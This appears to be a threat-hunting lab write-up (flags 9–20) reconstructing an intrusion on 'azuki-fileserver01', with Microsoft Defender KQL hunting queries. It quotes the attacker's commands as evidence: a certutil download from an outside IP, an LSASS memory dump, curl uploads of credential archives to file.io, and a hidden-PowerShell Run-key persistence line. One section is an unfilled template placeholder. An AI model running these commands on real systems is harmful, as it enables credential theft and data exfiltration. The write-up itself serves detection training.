### 🚩 Flag #9: COLLECTION - Staging Directory Path **🎯 Objective** Attackers establish staging locations to organise tools and stolen data before exfiltration. This directory path is a critical IOC. **📌 Finding** C:\Windows\Logs\CBS **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T00:55:43.9986049Z | | Process | attrib.exe | | Parent Process | powershell.exe | | Command Line | "attrib.exe" +h +s C:\Windows\Logs\CBS" | **💡 Why it matters** Attackers commonly create staging directories to aggregate tools, scripts, and collected data before exfiltration, reducing noise and improving operational efficiency. Placing a staging directory under a trusted Windows path such as C:\Windows\Logs\CBS helps the activity blend into legitimate system files and evade casual inspection. The prior use of attribute manipulation to hide this directory further reinforces intent to conceal attacker activity rather than normal administrative use. This behavior aligns with MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, often observed shortly before data exfiltration or lateral movement. When a hidden staging directory is identified on a server, it represents a high-confidence indicator of post-compromise collection activity. **🔧 KQL Query Used** DeviceProcessEvents | where Timestamp between (startofday(date(2025-11-22)) .. endofday(date(2025-11-22))) | where DeviceName contains "azuki" | where ProcessCommandLine has_any ("{", "[", "+", "|") | where InitiatingProcessFileName == "powershell.exe" | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName | order by Timestamp asc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for suspicious directories created or modified within trusted Windows paths that are rarely used for custom data storage. Focus on directories that are hidden, system-marked, or accessed by scripting engines rather than standard Windows services. Correlating directory creation or modification with prior discovery and defense evasion activity can help identify active staging locations before exfiltration occurs.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath startswith @"C:\Windows\"
| where ActionType in ("FileCreated", "FolderCreated", "FileModified")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend SuspiciousPath = FolderPath
| project TimeGenerated, DeviceName, AccountName, ActionType, SuspiciousPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #10: DEFENSE EVASION - Script Download Command **🎯 Objective** Legitimate system utilities with network capabilities are frequently weaponized to download malware while evading detection. **📌 Finding** "certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1" **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T00:56:47.4100711Z | | Process | certutil.exe | | Parent Process | powershell.exe | | Command Line | `certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1` | **💡 Why it matters** [Explain the impact, real-world relevance, MITRE mapping, and why this is a high-signal indicator. 4-6 sentences for depth.] **🔧 KQL Query Used** DeviceProcessEvents | where Timestamp between (startofday(date(2025-11-22)) .. endofday(date(2025-11-22))) | where DeviceName contains "azuki" | where InitiatingProcessFileName == "powershell.exe" and InitiatingProcessCommandLine !contains "Windows Defender Advanced Threat Protection" | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName | order by Timestamp asc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunting on signed Windows utilities with network functionality (LOLBINs) executing outbound downloads, especially when initiated by scripting engines. Pay close attention to downloads targeting unusual directories such as C:\Windows\Logs\ or user-writable system paths. Correlating certutil usage with prior staging, discovery, or defense evasion activity significantly increases detection fidelity.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "certutil.exe"
| where ProcessCommandLine has_any ("-urlcache", "http://", "https://")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend DownloadURL = extract(@"(http[s]?://[^\s]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, DownloadURL, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #11: COLLECTION - Credential File Discovery **🎯 Objective** Credential files provide keys to the kingdom - enabling lateral movement and privilege escalation across the network. **📌 Finding** IT-Admin-Passwords.csv **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:07:53.6746323Z | | Process | xcopy.exe | | Parent Process | N/A | | Command Line | `xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` | **💡 Why it matters** Credential files such as spreadsheets or CSVs containing administrative passwords represent some of the highest-value assets an attacker can obtain during an intrusion. By copying an entire IT administrator directory into a hidden staging location, the attacker is clearly preparing credentials for later use, exfiltration, or offline analysis. Possession of valid admin credentials enables rapid lateral movement, privilege escalation, and often full domain compromise without the need for noisy exploitation. This activity maps directly to MITRE ATT&CK T1552.001 – Unsecured Credentials: Credentials in Files, a technique frequently observed in real-world breaches and ransomware operations. File copy utilities like xcopy.exe performing bulk transfers from file shares into concealed directories are a strong, high-signal indicator of credential harvesting rather than legitimate administration. **🔧 KQL Query Used** let timeofattack = todatetime('2025-11-22T00:40:29.5749856Z'); DeviceFileEvents | where TimeGenerated between ((timeofattack - 1h) .. (timeofattack + 1h)) | where DeviceName contains "azuki" | where InitiatingProcessAccountName != "system" | where ActionType == "FileCreated" | project TimeGenerated, ActionType, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for non-system users copying large numbers of files from shared directories—especially IT, Finance, or Admin shares—into uncommon or hidden system paths. Prioritize activity involving archive, copy, or synchronization utilities staging data shortly after discovery or credential access events, as this often precedes exfiltration or lateral movement.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileCreated", "FileCopied")
| where InitiatingProcessFileName in ("xcopy.exe", "robocopy.exe", "powershell.exe", "cmd.exe")
| where FolderPath has_any ("\\FileShares\\", "\\IT", "\\Admin")
| where FolderPath has_any ("\\Windows\\Logs\\", "\\ProgramData\\", "\\Temp")
| where InitiatingProcessAccountName != "SYSTEM"
| project TimeGenerated, DeviceName, AccountName=InitiatingProcessAccountName,
FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #12: COLLECTION - Recursive Copy Command **🎯 Objective** Built-in system utilities are preferred for data staging as they're less likely to trigger security alerts. The exact command line reveals attacker methodology. **📌 Finding** "xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:07:53.6430063Z | | Process | xcopy.exe | | Parent Process | powershell.exe | | Command Line | `"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` | **💡 Why it matters** This activity confirms deliberate and systematic data collection rather than incidental file access. The attacker repeatedly used xcopy.exe to copy multiple high-value enterprise file shares (Contracts, Financial, IT-Admin, Shipping) into a single hidden staging directory, strongly indicating preparation for exfiltration or encryption. The consistency of tooling, destination path, and command-line switches shows hands-on keyboard activity aligned with human-operated intrusion behavior. Staging sensitive business and credential data locally is a common precursor to data theft, ransomware deployment, or double-extortion operations. This behavior maps directly to MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, with supporting elements of T1119 – Automated Collection, and represents a high-confidence indicator of attacker intent rather than reconnaissance alone. **🔧 KQL Query Used** let timeattack = todatetime('2025-11-22T00:40:29.5749856Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack - 3h) .. (timeattack + 3h)) | where DeviceName contains "azuki" | where FileName in ("robocopy.exe", "xcopy.exe") | project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by TimeGenerated asc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus on native file-copy utilities writing multiple distinct source directories into a single destination path within a short time window. Repeated use of xcopy.exe, robocopy.exe, or copy targeting unusual or hidden directories (especially under C:\Windows\) is a strong signal of staging activity and should be prioritized over single copy events.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("xcopy.exe", "robocopy.exe")
| where ProcessCommandLine has_any ("/E", "/I", "/H")
| where ProcessCommandLine contains @"C:\Windows\"
| summarize CopyCount = count(),
DistinctSources = dcount(extract(@"([A-Z]:\\[^ ]+)", 1, ProcessCommandLine)),
FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated)
by DeviceName, AccountName, ProcessCommandLine
| where CopyCount >= 2 or DistinctSources >= 2
| order by LastSeen desc
### 🚩 Flag #13: COLLECTION - Compression Command **🎯 Objective** Cross-platform compression tools indicate attacker sophistication. The full command line reveals the exact archiving methodology used. **📌 Finding** "tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin . **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:30:10.0981853Z | | Process | tar.exe | | Parent Process | powershell.exe | | Command Line | `tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin` | **💡 Why it matters** The use of tar.exe on a Windows system is a strong indicator of deliberate attacker tradecraft rather than routine administrative activity. Attackers commonly compress staged data to reduce size, preserve directory structure, and prepare files for rapid exfiltration or encryption. In this case, the archive targets a hidden staging directory (C:\Windows\Logs\CBS\it-admin) that already contains harvested credential material, confirming this activity as a late-stage collection step rather than benign maintenance. Compression marks a clear transition from discovery and collection into exfiltration readiness, meaning containment urgency is high. This behavior aligns with MITRE ATT&CK T1560.001 – Archive Collected Data: Archive via Utility, a technique frequently observed immediately prior to data theft or ransomware deployment. **🔧 KQL Query Used** let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack4 - 2h) .. (timeattack4 + 2h)) | where DeviceName contains "azuki" | where FileName in ("tar.exe", "gzip.exe") | project TimeGenerated, DeviceName, AccountName, ActionType, ProcessCommandLine, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query during proactive threat hunts to identify archive creation from suspicious or nonstandard directories (e.g., Windows\Logs, Temp, user-writable system paths). Pay close attention to compression tools executed by scripting engines such as PowerShell, and correlate results with earlier file copy or credential discovery activity to confirm malicious staging behavior.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("tar.exe", "gzip.exe", "7z.exe", "rar.exe")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #14: CREDENTIAL ACCESS - Renamed Tool **🎯 Objective** Renaming credential dumping tools is a basic OPSEC practice to evade signature-based detection. **📌 Finding** pd.exe **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:03:19.9845969Z | | Process | powershell.exe | | Parent Process | powershell.exe | | Command Line | `powershell.exe` | **💡 Why it matters** Renaming credential dumping tools is a common evasion technique used to bypass signature-based detections that rely on known filenames such as mimikatz.exe. The appearance of an unfamiliar executable (pd.exe) created shortly before credential access activity strongly suggests a renamed or custom-packed dumping utility. Attackers frequently stage these tools under innocuous names to blend into the environment and delay defender response. When combined with prior collection, staging, and compression behavior, this indicates the attacker is actively attempting to harvest credentials for lateral movement or privilege escalation. This activity maps to MITRE ATT&CK T1003 – OS Credential Dumping, with evasion via T1036 – Masquerading, and represents a high-confidence signal of hands-on-keyboard adversary activity. **🔧 KQL Query Used** let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z'); DeviceFileEvents | where TimeGenerated between ((timeattack4 - 1h) .. (timeattack4 + 1h)) | where DeviceName contains "azuki" | where ActionType == "FileCreated" | project TimeGenerated, DeviceName, ActionType, FileName, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for newly created executables in atypical directories that are shortly followed by credential access, discovery, or compression activity. Prioritize binaries launched by PowerShell or created outside standard install paths, especially on servers and high-value systems. Correlating file creation with suspicious process execution within a short time window significantly increases detection confidence.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType == "FileCreated"
| where FileName endswith ".exe"
| where FolderPath has_any ("\\Windows\\Logs\\", "\\Temp\\", "\\ProgramData\\")
| project TimeGenerated,
DeviceName,
FileName,
FolderPath,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #15: CREDENTIAL ACCESS - Memory Dump Command **🎯 Objective** The complete process memory dump command line is critical evidence showing exactly how credentials were extracted. **📌 Finding** "pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp" **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:24:44.3906047Z | | Process | pd.exe | | Parent Process | "powershell.exe" | | Command Line | '"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp' | **💡 Why it matters** Dumping the memory of LSASS (Local Security Authority Subsystem Service) is one of the most reliable indicators of credential theft on Windows systems. LSASS stores sensitive authentication material including plaintext credentials, NTLM hashes, and Kerberos tickets for logged-on users. In this case, the attacker used a renamed credential dumping tool (pd.exe) with explicit memory dump arguments (-ma) to target the LSASS process, confirming intentional credential access rather than accidental or benign behavior. Writing the dump file to a disguised staging directory (C:\Windows\Logs\CBS) further demonstrates attacker OPSEC and an attempt to evade casual inspection. This activity maps directly to MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory, a high-impact technique frequently used to enable privilege escalation, lateral movement, and full domain compromise. Detection of LSASS dumping should be treated as a containment-critical event. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | where ProcessCommandLine contains "pd.exe" | project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
When hunting for credential dumping, prioritize behavior over tool names. Attackers frequently rename utilities like ProcDump to evade signature-based detections, but LSASS dumping still requires distinctive command-line flags and access patterns. Focus on memory dump arguments (-ma, MiniDump, .dmp) combined with references to LSASS or dump files written to nonstandard directories.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where ProcessCommandLine has_any ("lsass", "-ma", ".dmp")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine,
FolderPath
| order by TimeGenerated desc
### 🚩 Flag #16: EXFILTRATION - Upload Command **🎯 Objective** Command-line HTTP clients enable scriptable data transfers. The complete command syntax is essential for building detection rules. **📌 Finding** curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T01:59:54.2755596Z | | Process | curl.exe | | Parent Process | powershell.exe | | Command Line | curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io | **💡 Why it matters** The use of curl.exe to upload an archive to an external file-sharing service represents a clear data exfiltration action, not preparation or staging. Command-line HTTP clients allow attackers to automate transfers, bypass browser-based controls, and operate quietly through scripts or living-off-the-land binaries. In this case, the attacker exfiltrated a compressed archive (credentials.tar.gz) from a disguised staging directory, confirming that previously collected and compressed credential material was successfully moved off the host. The destination, file.io, is a legitimate but commonly abused public file-sharing service, making this traffic blend into normal outbound HTTPS activity. This behavior aligns with MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Channel, and marks a critical point where sensitive data has already left the environment. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceProcessEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | where ProcessCommandLine contains "http" | project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunts on outbound data transfers initiated by scripting engines or command-line utilities rather than relying solely on destination reputation. File uploads using curl.exe or similar tools (wget, Invoke-WebRequest) combined with archive file extensions and public file-sharing domains are strong indicators of hands-on-keyboard exfiltration activity.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("curl.exe", "wget.exe")
| where ProcessCommandLine has_any ("http", "https", "-F", "--upload-file")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #17 EXFILTRATION - Cloud Service **🎯 Objective** Cloud file sharing services provide convenient, anonymous exfiltration channels that blend with legitimate business traffic. **📌 Finding** file.io **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:25:37.9206525Z | | Process | curl.exe | | Parent Process | powershell | | Command Line | "curl.exe" -F file=@C:\Windows\Logs\CBS\lsass.dmp https://file.io | **💡 Why it matters** Exfiltrating data to public cloud file-sharing services represents a high-risk data loss scenario because these platforms are widely trusted, encrypted, and commonly allowed through perimeter controls. Attackers favor services like file.io because uploads occur over standard HTTPS, making the traffic difficult to distinguish from legitimate business activity without endpoint context. In this case, the attacker uploaded a full LSASS memory dump, which almost certainly contains cached credentials, NTLM hashes, or Kerberos material. This confirms not just successful credential access, but successful credential theft and removal from the environment, eliminating any opportunity for recovery through containment alone. This behavior aligns with MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage, and represents a late-stage breach milestone where incident response urgency is critical. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceNetworkEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | project TimeGenerated, DeviceName, RemoteIP, RemoteUrl, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine | order by TimeGenerated desc **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for endpoint-initiated connections to public file-sharing services that originate from scripting engines or command-line tools rather than browsers. Prioritize uploads involving sensitive file types such as memory dumps, archives, or database exports, especially when correlated with prior credential dumping or compression activity.
DeviceNetworkEvents
| where TimeGenerated > ago(30d)
| where RemoteUrl has_any ("file.io", "transfer.sh", "anonfiles", "gofile", "pastebin")
| where InitiatingProcessFileName in ("curl.exe", "powershell.exe", "cmd.exe")
| where InitiatingProcessCommandLine has_any (".dmp", ".zip", ".tar", ".tar.gz", ".7z")
| project TimeGenerated,
DeviceName,
AccountName,
RemoteUrl,
RemoteIP,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #18: PERSISTENCE - Registry Value Name **🎯 Objective** Registry autorun keys provide reliable persistence that executes on every system startup or user logon. **📌 Finding** FileShareSync **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:10:50.8253766Z | | Process | reg.exe | | Parent Process | powershell | | Command Line | `reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` | **💡 Why it matters** Registry Run keys provide one of the most reliable and low-noise persistence mechanisms available to attackers, as they guarantee execution on every system startup or user logon. By choosing the value name FileShareSync, the attacker deliberately blends into expected enterprise software naming conventions, reducing the likelihood of casual discovery by administrators or users. The associated command launches a hidden PowerShell process that executes a script from a nonstandard system path, indicating continued control rather than a one-time payload. This persistence occurs after credential access and data exfiltration, strongly suggesting the attacker intends to maintain long-term access for follow-on operations or re-entry. This behavior maps directly to MITRE ATT&CK T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys, a technique commonly observed in hands-on-keyboard intrusions and ransomware precursor activity. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceRegistryEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to proactively identify newly created or modified Run key values, especially those added via command-line tools like reg.exe or PowerShell. Pay close attention to value names that appear legitimate but point to scripts, hidden PowerShell execution, or binaries located outside standard program directories. Correlating these events with earlier credential access or exfiltration activity significantly increases detection confidence.
DeviceRegistryEvents
| where TimeGenerated > ago(30d)
| where ActionType == "RegistryValueSet"
| where RegistryKey has @"\Software\Microsoft\Windows\CurrentVersion\Run"
| where InitiatingProcessFileName in ("reg.exe", "powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
RegistryValueName,
RegistryKey,
RegistryValueData,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #19: PERSISTENCE - Beacon Filename **🎯 Objective** Process masquerading involves naming malicious files after legitimate Windows components to avoid suspicion. **📌 Finding** svchost.ps1 **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:10:50.8253766Z | | Process | reg.exe | | Parent Process | powershell | | Command Line | `reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` | **💡 Why it matters** Masquerading malicious payloads as legitimate Windows components is a deliberate evasion technique designed to bypass both human review and basic security controls. By naming the beacon svchost.ps1, the attacker abuses trust in the well-known svchost.exe process, increasing the likelihood that the file will be overlooked during triage or routine audits. Placing this script in C:\Windows\System32 further strengthens the disguise, as files in this directory are typically assumed to be trusted and system-managed. When combined with a registry Run key, this filename choice enables stealthy, long-term persistence with minimal operational noise. This activity aligns with MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location, a common technique in post-exploitation phases where attackers prioritize survivability over speed. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceRegistryEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for script files (.ps1, .vbs, .js) located in system directories such as System32 or Windows\Logs, especially when referenced by autorun registry keys. Filenames that closely resemble legitimate Windows binaries (e.g., svchost, lsass, services) but use scripting extensions are high-confidence indicators of malicious persistence.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath has_any ("\\Windows\\System32", "\\Windows\\SysWOW64")
| where FileName endswith ".ps1"
| where FileName has_any ("svchost", "lsass", "services", "winlogon")
| project TimeGenerated,
DeviceName,
FileName,
FolderPath,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #20: ANTI-FORENSICS - History File Deletion **🎯 Objective** PowerShell saves command history to persistent files that survive session termination. Attackers target these files to cover their tracks. **📌 Finding** ConsoleHost_history.txt **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | ConsoleHost_history.txt | | Timestamp | 2025-11-22T02:26:01.1661095Z | | Process | powershell.exe | | Parent Process | explorer.exe | | Command Line | N/A | **💡 Why it matters** PowerShell maintains a persistent command history file (ConsoleHost_history.txt) specifically to support forensic reconstruction after an interactive session ends. Deleting this file is a deliberate anti-forensics action intended to erase evidence of executed commands, tooling, and operator intent. This behavior is rarely performed during normal administrative activity and typically occurs after credential access, persistence, or lateral movement—once the attacker is attempting to reduce visibility and slow incident response. The timing of this deletion shortly after malicious PowerShell activity strongly suggests an effort to conceal hands-on-keyboard operations. This activity maps to MITRE ATT&CK T1070.003 – Indicator Removal on Host: Clear Command History, a common cleanup technique used by post-compromise operators to frustrate forensic timelines and hinder root cause analysis. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceFileEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | where ActionType == "FileDel **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Monitor for deletion or truncation of PowerShell history files, particularly when initiated by powershell.exe or shortly following suspicious PowerShell execution. Correlate these events with credential access, registry persistence, or suspicious script execution to identify full attack chains.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileDeleted", "FileDeletedByProcess")
| where FileName =~ "ConsoleHost_history.txt"
| project TimeGenerated,
DeviceName,
FileName,
FolderPath,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
## High-Level Summary This intrusion represents a full-spectrum post-compromise attack leveraging valid credentials to re-enter the environment, move laterally via RDP, and systematically enumerate the network and host. The attacker demonstrated strong operational discipline by staging data in nonstandard system directories, abusing living-off-the-land binaries (LOLBins), and carefully sequencing actions to avoid early detection. Credential access via LSASS memory dumping marked a decisive escalation, followed by deliberate compression and exfiltration of sensitive data using both direct HTTP transfer and cloud-based file hosting to blend with legitimate traffic. Persistence was established through registry autorun keys using masqueraded filenames, and the operation concluded with targeted anti-forensic actions to remove PowerShell execution history. Overall, the activity reflects a capable adversary executing a methodical, goal-oriented campaign rather than opportunistic or automated malware.
标签:AI合规, ATT&CK框架, BurpSuite集成, DAST, Powershell, Windows日志, 威胁情报, 安全事件, 安全事件响应, 安全威胁, 安全漏洞, 安全策略, 安全防护, 安全防护工具, 安全防护手段, 安全防护技术, 安全防护措施, 安全防护方法, 安全防护策略, 开发者工具, 恶意软件分析, 提示词设计, 攻击技术, 文件属性, 目录隐藏, 私有化部署, 系统属性修改, 防御规避, 隐蔽文件